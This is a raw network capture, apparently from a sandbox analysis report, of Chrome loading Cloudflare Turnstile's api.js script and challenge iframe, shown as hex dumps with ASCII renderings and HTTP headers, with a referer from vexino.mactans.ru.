                                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                          Content-Length: 47692
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                                          last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                                                                                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f38965d7c69c334-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                          Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                          Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                                                                                                                                                                          Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                                                                                                                                                                          Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                                                                                                                                                                          Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                                                                                                                                                                          Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                                                                                                                                                                          Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          13192.168.2.1849794104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC797OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                          Referer: https://vexino.mactans.ru/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:03 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Content-Length: 26678
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                                                                                          cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                          cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                          origin-agent-cluster: ?1
                                                                                                                                                                                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                          referrer-policy: same-origin
                                                                                                                                                                                                                          document-policy: js-profiling
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 33 38 39 36 35 64 61 38 31 36 34 33 32 32 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: Server: cloudflareCF-RAY: 8f38965da8164322-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                                                                                                                                          Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                                                                                                                          Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                                                                                                                                          Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                                                                                                                                          Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                                                                                                                                          2024-12-17 17:21:03 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
